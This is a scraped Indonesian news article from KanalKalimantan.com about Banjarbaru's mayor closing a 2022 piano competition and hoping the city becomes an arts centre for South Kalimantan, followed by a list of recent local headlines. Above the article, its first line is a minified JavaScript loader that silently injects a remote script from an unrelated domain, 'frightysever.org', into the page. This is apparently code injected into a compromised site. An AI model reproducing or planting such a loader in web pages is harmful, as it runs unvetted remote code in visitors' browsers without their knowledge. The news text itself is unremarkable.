(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Wali Kota Aditya Tutup Kompetisi Piano 2022, Harapkan Banjarbaru jadi Barometer Kesenian Kalsel


KANALKALIMANTAN.COM, BANJARBARU – Wali Kota Banjarbaru Aditya Mufti Ariffin, secara resmi menutup kompetisi piano 2022 yang diadakan oleh Ardeval Swara Music, Sabtu (26/2/2022) malam.

Pada acara itu ia menyampai harapan bahwa Banjarbaru yang kini berstatus ibu kota provinsi kelak dapat menjadi barometer bidang kesenian di Kalimantan Selatan.

“Banjarbaru yang hari ini berstatus ibu kota, diharapkan dapat menjadi barometer di Kalsel. Baik itu kesenian maupun bidang-bidang lainnya. Dan itu mudahan berawal dari kawasan Minggu Raya ini,” katanya.

Kehadiran Wali Kota Banjarbaru itu juga sekaligus menyerahkan secara langsung piala penghargaan terhadap para peserta lomba piano. Turut pula mendampingi Kepala Dinas Pemuda Olahraga Kebudayaan dan Pariwisata (Disporabudpar) Kota Banjarbaru, A Yani Makkie, Ketua Dewan Kesenian Banjarbaru, HE Benyamine dan Ketua Panitia Piano Competition Ardeval Swara Music, Tery Devara.

 

Baca juga : SMADA CUP 2022 Berakhir, SMAN 2 Amuntai Cari ‘Bibit’ Atlet Berprestasi Lewat Kelas Olahraga!

Usai menyerahkan piala, Wali Kota Banjarbaru, memastikan bahwa Pemerintah Kota (Pemko) Banjarbaru sangat mendukung pelaksanaan kegiatan kesenian di Banjarbaru. Dirinya berharap dengan pelaksanaan kompetisi piano malam ini dalam melahirkan pianis berprestasi asal Banjarbaru.

“Kegiatan seperti ini bisa terus dilaksanakan dalam rangka menambah semangat kompetisi anak-anak kita di Banjarbaru. Saya tentu berharap kegiatan malam ini dapat melahirkan pianis terbaik asal Banjarbaru. Kepada pemenang jangan berpuas diri. Lalu yang belum menang, jangan berkecil hati dan tetap semangat untuk menjadi seorang JUARA,” harapnya.

Kompetisi piano 2022 yang diadakan Aredeval Swara Music ini diikuti para pianis baik dari kategori pemula, junior hingga senior. Adapun jumlah peserta yang mengikuti kompetisi berjumlah 35 orang.

Kepala Disporabudpar, A Yani Makkie, mengungkapkan bahwa kegiatan seni musik seperti ini memiliki daya tarik tersendiri bagi masyarakat maupun penonton yang hadir untuk belajar bermain piano. Meski diakuinya, bermain alat musik piano ini memerlukan ketelitian dan konsentrasi yang tinggi agar dapat menghasilkan nada-nada yang indah.

 

Baca juga : Tabrak Lari di Jalan Arah Kiram, Rosina dan Bayinya Meninggal Dunia

“Tentu kami mendorong kegiatan seperti ini bisa menjadi event tahunan di Kota Banjarbaru, sehingga para pianis bisa lebih mempersiapkan diri untuk mengikuti kompetisi selanjutnya,” ujarnya.

Yani Makkie mengatakan bahwa Pemko Banjarbaru juga membuka pintu selebar-lebarnya bagi para pianis, untuk dapat mengembangkan kemampuan dan menambah ‘jam terbang’ dengan tampil di atas panggung.

“Mereka bisa tampil di Panggung Bundar Minggu Raya ini, di panggung Mess L, maupun di panggung Misbar,” tuntasnya. (Kanalkalimantan.com/al)

Reporter : al
Editor : cell


Desy Arfianty

Recent Posts

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

1 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

3 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

4 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

4 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

8 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

19 jam ago

This website uses cookies.